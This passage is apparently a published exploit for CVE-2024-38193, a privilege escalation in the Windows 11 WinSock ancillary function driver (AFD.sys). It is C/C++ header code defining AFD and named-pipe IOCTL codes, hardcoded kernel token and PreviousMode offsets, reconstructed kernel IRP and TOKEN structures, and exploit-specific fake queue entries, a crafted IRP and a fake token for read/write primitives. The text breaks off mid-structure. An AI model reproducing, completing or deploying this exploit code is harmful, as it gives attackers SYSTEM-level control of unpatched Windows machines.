# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193

#pragma once
#include "ntstatus.h"
#include "Windows.h"
#include <iostream>
#pragma comment(lib, "ntdll.lib")

#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))

#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"

#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8

#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE

typedef struct IO_STATUS_BLOCK {
    union {
        DWORD Status;
        PVOID Pointer;
    };
    DWORD* Information;
};

//0x4 bytes (sizeof)
struct _SYSTEM_POWER_STATE_CONTEXT {
    union {
        struct {
            ULONG Reserved1 : 8;                //0x0
            ULONG TargetSystemState : 4;        //0x0
            ULONG EffectiveSystemState : 4;     //0x0
            ULONG CurrentSystemState : 4;       //0x0
            ULONG IgnoreHibernationPath : 1;    //0x0
            ULONG PseudoTransition : 1;         //0x0
            ULONG KernelSoftReboot : 1;         //0x0
            ULONG DirectedDripsTransition : 1;  //0x0
            ULONG Reserved2 : 8;                //0x0
        };
        ULONG ContextAsUlong;                   //0x0
    };
};

//0x4 bytes (sizeof)
union _POWER_STATE {
    enum _SYSTEM_POWER_STATE SystemState;       //0x0
    enum _DEVICE_POWER_STATE DeviceState;       //0x0
};

//0x48 bytes (sizeof)
typedef struct _IO_STACK_LOCATION {
    UCHAR MajorFunction;  //0x0
    UCHAR MinorFunction;  //0x1
    UCHAR Flags;          //0x2
    UCHAR Control;        //0x3
    union {
        struct {
            struct _IO_SECURITY_CONTEXT* SecurityContext;  //0x8
            ULONG Options;                                 //0x10
            USHORT FileAttributes;                         //0x18
            USHORT ShareAccess;                            //0x1a
            ULONG EaLength;                                //0x20
        } Create;  //0x8
        struct {
            struct _IO_SECURITY_CONTEXT* SecurityContext;       //0x8
            ULONG Options;                                      //0x10
            USHORT Reserved;                                    //0x18
            USHORT ShareAccess;                                 //0x1a
            struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters;   //0x20
        } CreatePipe;  //0x8
        struct {
            struct _IO_SECURITY_CONTEXT* SecurityContext;       //0x8
            ULONG Options;                                      //0x10
            USHORT Reserved;                                    //0x18
            USHORT ShareAccess;                                 //0x1a
            struct _MAILSLOT_CREATE_PARAMETERS* Parameters;     //0x20
        } CreateMailslot;  //0x8
        struct {
            ULONG Length;                      //0x8
            ULONG Key;                         //0x10
            ULONG Flags;                       //0x14
            union _LARGE_INTEGER ByteOffset;   //0x18
        } Read;  //0x8
        struct {
            ULONG Length;                      //0x8
            ULONG Key;                         //0x10
            ULONG Flags;                       //0x14
            union _LARGE_INTEGER ByteOffset;   //0x18
        } Write;  //0x8
        struct {
            ULONG Length;                                        //0x8
            struct _UNICODE_STRING* FileName;                    //0x10
            enum _FILE_INFORMATION_CLASS FileInformationClass;   //0x18
            ULONG FileIndex;                                     //0x20
        } QueryDirectory;  //0x8
        struct {
            ULONG Length;            //0x8
            ULONG CompletionFilter;  //0x10
        } NotifyDirectory;  //0x8
        struct {
            ULONG Length;                                                                 //0x8
            ULONG CompletionFilter;                                                       //0x10
            enum _DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass;     //0x18
        } NotifyDirectoryEx;  //0x8
        struct {
            ULONG Length;                                        //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass;   //0x10
        } QueryFile;  //0x8
        struct {
            ULONG Length;                                        //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass;   //0x10
            struct _FILE_OBJECT* FileObject;                     //0x18
            union {
                struct {
                    UCHAR ReplaceIfExists;  //0x20
                    UCHAR AdvanceOnly;      //0x21
                };
                ULONG ClusterCount;         //0x20
                VOID* DeleteHandle;         //0x20
            };
        } SetFile;  //0x8
        struct {
            ULONG Length;         //0x8
            VOID* EaList;         //0x10
            ULONG EaListLength;   //0x18
            ULONG EaIndex;        //0x20
        } QueryEa;  //0x8
        struct {
            ULONG Length;  //0x8
        } SetEa;  //0x8
        struct {
            ULONG Length;                             //0x8
            enum _FSINFOCLASS FsInformationClass;     //0x10
        } QueryVolume;  //0x8
        struct {
            ULONG Length;                             //0x8
            enum _FSINFOCLASS FsInformationClass;     //0x10
        } SetVolume;  //0x8
        struct {
            ULONG OutputBufferLength;   //0x8
            ULONG InputBufferLength;    //0x10
            ULONG FsControlCode;        //0x18
            VOID* Type3InputBuffer;     //0x20
        } FileSystemControl;  //0x8
        struct {
            union _LARGE_INTEGER* Length;       //0x8
            ULONG Key;                          //0x10
            union _LARGE_INTEGER ByteOffset;    //0x18
        } LockControl;  //0x8
        struct {
            ULONG OutputBufferLength;   //0x8
            ULONG InputBufferLength;    //0x10
            ULONG IoControlCode;        //0x18
            VOID* Type3InputBuffer;     //0x20
        } DeviceIoControl;  //0x8
        struct {
            ULONG SecurityInformation;  //0x8
            ULONG Length;               //0x10
        } QuerySecurity;  //0x8
        struct {
            ULONG SecurityInformation;  //0x8
            VOID* SecurityDescriptor;   //0x10
        } SetSecurity;  //0x8
        struct {
            struct _VPB* Vpb;                      //0x8
            struct _DEVICE_OBJECT* DeviceObject;   //0x10
        } MountVolume;  //0x8
        struct {
            struct _VPB* Vpb;                      //0x8
            struct _DEVICE_OBJECT* DeviceObject;   //0x10
        } VerifyVolume;  //0x8
        struct {
            struct _SCSI_REQUEST_BLOCK* Srb;  //0x8
        } Scsi;  //0x8
        struct {
            ULONG Length;                                    //0x8
            VOID* StartSid;                                  //0x10
            struct _FILE_GET_QUOTA_INFORMATION* SidList;     //0x18
            ULONG SidListLength;                             //0x20
        } QueryQuota;  //0x8
        struct {
            ULONG Length;  //0x8
        } SetQuota;  //0x8
        struct {
            enum _DEVICE_RELATION_TYPE Type;  //0x8
        } QueryDeviceRelations;  //0x8
        struct {
            struct _GUID* InterfaceType;     //0x8
            USHORT Size;                     //0x10
            USHORT Version;                  //0x12
            struct _INTERFACE* Interface;    //0x18
            VOID* InterfaceSpecificData;     //0x20
        } QueryInterface;  //0x8
        struct {
            struct _DEVICE_CAPABILITIES* Capabilities;  //0x8
        } DeviceCapabilities;  //0x8
        struct {
            struct _IO_RESOURCE_REQUIREMENTS_LIST* IoResourceRequirementList;  //0x8
        } FilterResourceRequirements;  //0x8
        struct {
            ULONG WhichSpace;   //0x8
            VOID* Buffer;       //0x10
            ULONG Offset;       //0x18
            ULONG Length;       //0x20
        } ReadWriteConfig;  //0x8
        struct {
            UCHAR Lock;  //0x8
        } SetLock;  //0x8
        struct {
            enum BUS_QUERY_ID_TYPE IdType;  //0x8
        } QueryId;  //0x8
        struct {
            enum DEVICE_TEXT_TYPE DeviceTextType;  //0x8
            ULONG LocaleId;                        //0x10
        } QueryDeviceText;  //0x8
        struct {
            UCHAR InPath;                                  //0x8
            UCHAR Reserved[3];                             //0x9
            enum _DEVICE_USAGE_NOTIFICATION_TYPE Type;     //0x10
        } UsageNotification;  //0x8
        struct {
            enum _SYSTEM_POWER_STATE PowerState;  //0x8
        } WaitWake;  //0x8
        struct {
            struct _POWER_SEQUENCE* PowerSequence;  //0x8
        } PowerSequence;  //0x8
        struct {
            union {
                ULONG SystemContext;                                          //0x8
                struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;   //0x8
            };
            enum _POWER_STATE_TYPE Type;         //0x10
            union _POWER_STATE State;            //0x18
            enum POWER_ACTION ShutdownType;      //0x20
        } Power;  //0x8
        struct {
            struct _CM_RESOURCE_LIST* AllocatedResources;             //0x8
            struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated;   //0x10
        } StartDevice;  //0x8
        struct {
            ULONGLONG ProviderId;   //0x8
            VOID* DataPath;         //0x10
            ULONG BufferSize;       //0x18
            VOID* Buffer;           //0x20
        } WMI;  //0x8
        struct {
            VOID* Argument1;  //0x8
            VOID* Argument2;  //0x10
            VOID* Argument3;  //0x18
            VOID* Argument4;  //0x20
        } Others;  //0x8
    } Parameters;  //0x8
    struct _DEVICE_OBJECT* DeviceObject;  //0x28
    struct _FILE_OBJECT* FileObject;      //0x30
    LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2, VOID* arg3);  //0x38
    VOID* Context;                        //0x40
}IO_STACK_LOCATION;

//0x18 bytes (sizeof)
struct _KDEVICE_QUEUE_ENTRY {
    struct _LIST_ENTRY DeviceListEntry;  //0x0
    ULONG SortKey;                       //0x10
    UCHAR Inserted;                      //0x14
};

//0x58 bytes (sizeof)
struct _KAPC {
    UCHAR Type;                          //0x0
    UCHAR AllFlags;                      //0x1
    UCHAR Size;                          //0x2
    UCHAR SpareByte1;                    //0x3
    ULONG SpareLong0;                    //0x4
    struct _KTHREAD* Thread;             //0x8
    struct _LIST_ENTRY ApcListEntry;     //0x10
    VOID* Reserved[3];                   //0x20
    VOID* NormalContext;                 //0x38
    VOID* SystemArgument1;               //0x40
    VOID* SystemArgument2;               //0x48
    CHAR ApcStateIndex;                  //0x50
    CHAR ApcMode;                        //0x51
    UCHAR Inserted;                      //0x52
};

//0xd0 bytes (sizeof)
struct _IRP {
    SHORT Type;                              //0x0
    USHORT Size;                             //0x2
    USHORT AllocationProcessorNumber;        //0x4
    USHORT Reserved;                         //0x6
    struct _MDL* MdlAddress;                 //0x8
    ULONG Flags;                             //0x10
    union {
        struct _IRP* MasterIrp;              //0x18
        LONG IrpCount;                       //0x18
        VOID* SystemBuffer;                  //0x18
    } AssociatedIrp;                         //0x18
    struct _LIST_ENTRY ThreadListEntry;      //0x20
    struct IO_STATUS_BLOCK IoStatus;         //0x30
    CHAR RequestorMode;                      //0x40
    UCHAR PendingReturned;                   //0x41
    CHAR StackCount;                         //0x42
    CHAR CurrentLocation;                    //0x43
    UCHAR Cancel;                            //0x44
    UCHAR CancelIrql;                        //0x45
    CHAR ApcEnvironment;                     //0x46
    UCHAR AllocationFlags;                   //0x47
    union {
        struct _IO_STATUS_BLOCK* UserIosb;   //0x48
        VOID* IoRingContext;                 //0x48
    };
    struct _KEVENT* UserEvent;               //0x50
    union {
        struct {
            union {
                VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK* arg2, ULONG arg3);  //0x58
                VOID* IssuingProcess;                //0x58
            };
            union {
                VOID* UserApcContext;                //0x60
                struct _IORING_OBJECT* IoRing;       //0x60
            };
        } AsynchronousParameters;                    //0x58
        union _LARGE_INTEGER AllocationSize;         //0x58
    } Overlay;                                       //0x58
    VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);  //0x68
    VOID* UserBuffer;                                //0x70
    union {
        struct {
            union {
                struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry;    //0x78
                VOID* DriverContext[4];                          //0x78
            };
            struct _ETHREAD* Thread;                             //0x98
            CHAR* AuxiliaryBuffer;                               //0xa0
            struct _LIST_ENTRY ListEntry;                        //0xa8
            union {
                struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
                ULONG PacketType;                                //0xb8
            };
            struct _FILE_OBJECT* OriginalFileObject;             //0xc0
            VOID* IrpExtension;                                  //0xc8
        } Overlay;                                               //0x78
        struct _KAPC Apc;                                        //0x78
        VOID* CompletionKey;                                     //0x78
    } Tail;                                                      //0x78
};

typedef struct _TA_ADDRESS {
    USHORT AddressLength;
    USHORT AddressType;
    UCHAR Address[1];
}TA_ADDRESS;

typedef struct _TRANSPORT_ADDRESS {
    LONG TAAddressCount;
    TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _SYSTEM_MODULE_ENTRY {
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Count;
    SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
    PVOID Object;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR HandleValue;
    ULONG GrantedAccess;
    USHORT CreatorBackTraceIndex;
    USHORT ObjectTypeIndex;
    ULONG HandleAttributes;
    ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;

typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
    ULONG_PTR NumberOfHandles;
    ULONG_PTR Reserved;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;

typedef struct _AFD_CREATE_PACKET {
    //FILE_FULL_EA_INFORMATION
    ULONG NextEntryOffset;
    WORD Flags;
    UCHAR EaNameLength;
    USHORT EaValueLength;
    CHAR EaName[15];
    //AFD_CREATE_PACKET
    ULONG EndpointFlags;
    ULONG GroupID;
    ULONG AddressFamily;
    ULONG SocketType;
    ULONG Protocol;
    ULONG SizeOfTransportName;
    wchar_t TransportName[16];
    //UCHAR Unknown;
} AFD_CREATE_PACKET;

enum THREADINFOCLASS {
    ThreadImpersonationToken = 5
};

enum SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemExtendedHandleInformation = 64
};

typedef enum EVENT_TYPE {
    NotificationEvent,
    SynchronizationEvent
};

typedef struct _AFD_BIND_DATA {
    ULONG ShareType;
    SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;

typedef struct alignas(16) MY_AFD_CONNECT_INFO {
    __int64 UseSan;
    __int64 hNtSock1;
    __int64 Unknown;
    __int32 tmp6;
    WORD const_16;
    sockaddr_in bind;
};

typedef struct FAKE_DATA_ENTRY_QUEUE {
    DWORD tmp;
    LIST_ENTRY nextQueue;
    __int64 unknown;
    PVOID security_client_context;
    __int64 unknown2;
    __int64 sizeOfData;
    char DATA[0x77FD0];
};

typedef struct _AFD_LISTEN_INFO {
    ULONG unknown;
    __int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;

typedef struct _SECURITY_CLIENT_CONTEXT {
    _SECURITY_QUALITY_OF_SERVICE SecurityQos;
    void* ClientToken;
    unsigned __int8 DirectlyAccessClientToken;
    unsigned __int8 DirectAccessEffectiveOnly;
    unsigned __int8 ServerIsRemote;
    _TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;

struct __declspec(align(8)) _OWNER_ENTRY {
    unsigned __int64 OwnerThread;
    DWORD ___u1;
};

//0x68 bytes (sizeof)
typedef struct _ERESOURCE {
    struct _LIST_ENTRY SystemResourcesList;  //0x0
    struct _OWNER_ENTRY* OwnerTable;         //0x10
    SHORT ActiveCount;                       //0x18
    union {
        USHORT Flag;                         //0x1a
        struct {
            UCHAR ReservedLowFlags;          //0x1a
            UCHAR WaiterPriority;            //0x1b
        };
    };
    VOID* SharedWaiters;                     //0x20
    VOID* ExclusiveWaiters;                  //0x28
    struct _OWNER_ENTRY OwnerEntry;          //0x30
    ULONG ActiveEntries;                     //0x40
    ULONG ContentionCount;                   //0x44
    ULONG NumberOfSharedWaiters;             //0x48
    ULONG NumberOfExclusiveWaiters;          //0x4c
    VOID* Reserved2;                         //0x50
    union {
        VOID* Address;                       //0x58
        ULONGLONG CreatorBackTraceIndex;     //0x58
    };
    ULONGLONG SpinLock;                      //0x60
}ERESOURCE, *PERESOURCE;

//0x8 bytes (sizeof)
typedef struct _EX_PUSH_LOCK {
    union {
        struct {
            ULONGLONG Locked : 1;            //0x0
            ULONGLONG Waiting : 1;           //0x0
            ULONGLONG Waking : 1;            //0x0
            ULONGLONG MultipleShared : 1;    //0x0
            ULONGLONG Shared : 60;           //0x0
        };
        ULONGLONG Value;                     //0x0
        VOID* Ptr;                           //0x0
    };
};

//0x10 bytes (sizeof)
typedef struct _SEP_CACHED_HANDLES_TABLE {
    struct _EX_PUSH_LOCK Lock;                    //0x0
    struct _RTL_DYNAMIC_HASH_TABLE* HashTable;    //0x8
};

//0x8 bytes (sizeof)
typedef struct _EX_RUNDOWN_REF {
    union {
        ULONGLONG Count;  //0x0
        VOID* Ptr;        //0x0
    };
};

//0x20 bytes (sizeof)
typedef struct _OB_HANDLE_REVOCATION_BLOCK {
    struct _LIST_ENTRY RevocationInfos;   //0x0
    struct _EX_PUSH_LOCK Lock;            //0x10
    struct _EX_RUNDOWN_REF Rundown;       //0x18
};

//0xc0 bytes (sizeof)
typedef struct _SEP_LOGON_SESSION_REFERENCES {
    struct _SEP_LOGON_SESSION_REFERENCES* Next;                             //0x0
    struct _LUID LogonId;                                                   //0x8
    struct _LUID BuddyLogonId;                                              //0x10
    LONGLONG ReferenceCount;                                                //0x18
    ULONG Flags;                                                            //0x20
    struct _DEVICE_MAP* pDeviceMap;                                         //0x28
    VOID* Token;                                                            //0x30
    struct _UNICODE_STRING AccountName;                                     //0x38
    struct _UNICODE_STRING AuthorityName;                                   //0x48
    struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable;                    //0x58
    struct _EX_PUSH_LOCK SharedDataLock;                                    //0x68
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;  //0x70
    struct _SEP_SID_VALUES_BLOCK* SharedSidValues;                          //0x78
    struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock;                     //0x80
    struct _EJOB* ServerSilo;                                               //0xa0
    struct _LUID SiblingAuthId;                                             //0xa8
    struct _LIST_ENTRY TokenList;                                           //0xb0
};

//0x30 bytes (sizeof)
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION {
    ULONG SecurityAttributeCount;                       //0x0
    struct _LIST_ENTRY SecurityAttributesList;          //0x8
    ULONG WorkingSecurityAttributeCount;                //0x18
    struct _LIST_ENTRY WorkingSecurityAttributesList;   //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;

//0x20 bytes (sizeof)
typedef struct _SEP_SID_VALUES_BLOCK {
    ULONG BlockLength;          //0x0
    LONGLONG ReferenceCount;    //0x8
    ULONG SidCount;             //0x10
    ULONGLONG SidValuesStart;   //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;

//0x18 bytes (sizeof)
struct _SEP_TOKEN_PRIVILEGES {
    ULONGLONG Present;            //0x0
    ULONGLONG Enabled;            //0x8
    ULONGLONG EnabledByDefault;   //0x10
};

//0x1f bytes (sizeof)
struct _SEP_AUDIT_POLICY {
    struct _TOKEN_AUDIT_POLICY AdtTokenPolicy;  //0x0
    UCHAR PolicySetStatus;                      //0x1e
};

//0x498 bytes (sizeof)
struct _TOKEN {
    struct _TOKEN_SOURCE TokenSource;                                       //0x0
    struct _LUID TokenId;                                                   //0x10
    struct _LUID AuthenticationId;                                          //0x18
    struct _LUID ParentTokenId;                                             //0x20
    union _LARGE_INTEGER ExpirationTime;                                    //0x28
    struct _ERESOURCE* TokenLock;                                           //0x30
    struct _LUID ModifiedId;                                                //0x38
    struct _SEP_TOKEN_PRIVILEGES Privileges;                                //0x40
    struct _SEP_AUDIT_POLICY AuditPolicy;                                   //0x58
    ULONG SessionId;                                                        //0x78
    ULONG UserAndGroupCount;                                                //0x7c
    ULONG RestrictedSidCount;                                               //0x80
    ULONG VariableLength;                                                   //0x84
    ULONG DynamicCharged;                                                   //0x88
    ULONG DynamicAvailable;                                                 //0x8c
    ULONG DefaultOwnerIndex;                                                //0x90
    struct _SID_AND_ATTRIBUTES* UserAndGroups;                              //0x98
    struct _SID_AND_ATTRIBUTES* RestrictedSids;                             //0xa0
    VOID* PrimaryGroup;                                                     //0xa8
    ULONG* DynamicPart;                                                     //0xb0
    struct _ACL* DefaultDacl;                                               //0xb8
    enum _TOKEN_TYPE TokenType;                                             //0xc0
    enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel;                  //0xc4
    ULONG TokenFlags;                                                       //0xc8
    UCHAR TokenInUse;                                                       //0xcc
    ULONG IntegrityLevelIndex;                                              //0xd0
    ULONG MandatoryPolicy;                                                  //0xd4
    void* LogonSession;                                                     //0xd8
    struct _LUID OriginatingLogonSession;                                   //0xe0
    struct _SID_AND_ATTRIBUTES_HASH SidHash;                                //0xe8
    struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash;                      //0x1f8
    struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; //0x308
    VOID* Package;                                                          //0x310
    struct _SID_AND_ATTRIBUTES* Capabilities;                               //0x318
    ULONG CapabilityCount;                                                  //0x320
    struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash;                       //0x328
    struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry;                     //0x438
    struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry;                   //0x440
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;       //0x448
    VOID* TrustLevelSid;                                                    //0x450
    struct _TOKEN* TrustLinkedToken;                                        //0x458
    VOID* IntegrityLevelSidValue;                                           //0x460
    struct _SEP_SID_VALUES_BLOCK* TokenSidValues;                           //0x468
    struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry;                        //0x470
    struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo;                     //0x478
    struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry;             //0x480
    VOID* SessionObject;                                                    //0x488
    ULONGLONG VariablePart;                                                 //0x490
};

//0x38 bytes (sizeof)
struct _OBJECT_HEADER {
    LONGLONG PointerCount;                                  //0x0
    union {
        LONGLONG HandleCount;                               //0x8
        VOID* NextToFree;                                   //0x8
    };
    struct _EX_PUSH_LOCK Lock;                              //0x10
    UCHAR TypeIndex;                                        //0x18
    union {
        UCHAR TraceFlags;                                   //0x19
        struct {
            UCHAR DbgRefTrace : 1;                          //0x19
            UCHAR DbgTracePermanent : 1;                    //0x19
        };
    };
    UCHAR InfoMask;                                         //0x1a
    union {
        UCHAR Flags;                                        //0x1b
        struct {
            UCHAR NewObject : 1;                            //0x1b
            UCHAR KernelObject : 1;                         //0x1b
            UCHAR KernelOnlyAccess : 1;                     //0x1b
            UCHAR ExclusiveObject : 1;                      //0x1b
            UCHAR PermanentObject : 1;                      //0x1b
            UCHAR DefaultSecurityQuota : 1;                 //0x1b
            UCHAR SingleHandleEntry : 1;                    //0x1b
            UCHAR DeletedInline : 1;                        //0x1b
        };
    };
    ULONG Reserved;                                         //0x1c
    union {
        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
        VOID* QuotaBlockCharged;                            //0x20
    };
    VOID* SecurityDescriptor;                               //0x28
    struct _TOKEN Body;                                     //0x30
};

struct mm {
    void* fake_data_entry;
    void* input;
    _IRP* crafted_irp;
    IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
    void* p_mem_0x30;
    void* p_mem_0xD0_2;
    _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
    ACL* VariablePartDefaultDacl;
    ACL* VariablePartDefaultDacl2;
    _ERESOURCE* TokenLock;
    void* PrimaryGroup;
    int sizeOfClientTokenAndObjectHeader;
    PSEP_SID_VALUES_BLOCK TokenSidValues;
    _SECURITY_CLIENT_CONTEXT* security_client_context;
    _SEP_LOGON_SESSION_REFERENCES* LogonSession;
    _TOKEN* fakeToken;
    void *pipe_100_im_control_block;
    void* pipe_100_rw_control_block;
    void* p_mem_Pipe_hToPipe_1000_rw;
    void* p_mem_Pipe_hToPipe_1000_rw_2;
    HANDLE hPipeIM;
    HANDLE hPipeRW;
    HANDLE hFileIM;
    HANDLE hFileRW;
    HANDLE IncPrimitiveTOKEN;
    HANDLE RWPrimitiveTOKEN;
};

//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER {
    union {
        volatile LONG Lock;             //0x0
        LONG LockNV;                    //0x0
        struct {
            UCHAR Type;                 //0x0
            UCHAR Signalling;           //0x1
            UCHAR Size;                 //0x2
            UCHAR Reserved1;            //0x3
        };
        struct {
            UCHAR TimerType;            //0x0
            union {
                UCHAR TimerControlFlags; //0x1
                struct {
                    UCHAR Absolute : 1;